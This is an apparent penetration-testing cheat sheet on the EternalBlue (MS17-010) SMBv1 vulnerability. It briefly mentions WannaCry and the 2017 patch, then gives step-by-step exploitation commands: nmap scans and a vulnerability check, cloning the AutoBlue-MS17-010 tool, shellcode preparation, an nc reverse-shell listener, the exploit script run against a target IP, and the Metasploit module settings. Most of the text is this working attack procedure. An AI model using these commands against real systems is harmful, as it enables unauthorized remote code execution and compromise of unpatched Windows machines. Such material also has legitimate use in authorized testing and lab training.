EternalBlue

EternalBlue (MS-17-010) is the name given to a collection of Windows vulnerabilities and exploits that allow attackers to remotely execute arbitrary code and gain access to a system.

The EternalBlue exploit takes advantage of a vulnerability in Windows SMBv1 protocol.

The EternalBlue was used in the WannaCry ransomware attack to exploit other Windows systems across networks.

Microsoft released a patch for the vulnerability in March 2017; however, many users and companies have still not yet patched their systems.

Exploitation

nmap -sS -sV -O -p 445 TARGET_IP

# Check if the system is vulnerable to EternalBlue
nmap -sV -p 445 --script=smb-vuln-ms17-010 TARGET_IP

Manual Exploitation

This can be done using the tool AutoBlue-MS17-010.

# Clone repository https://github.com/3ndG4me/AutoBlue-MS17-010
git clone https://github.com/3ndG4me/AutoBlue-MS17-010

# Generate a shell code that will be exploited in the target system
cd AutoBlue-MS17-010/shell

./shell_prep.sh

# setup nc listener
nc -nvlp PORT

# Select the shell code depending on the target operating system and run the exploit
python3 eternalblue_exploit7.py TARGET_IP shellcode/sc_x64.bin

Metasploit Exploitation

search eternalblue

use exploit/windows/smb/ms17_010_eternalblue

set payload PAYLOAD

set RHOSTS TARGET_IP

run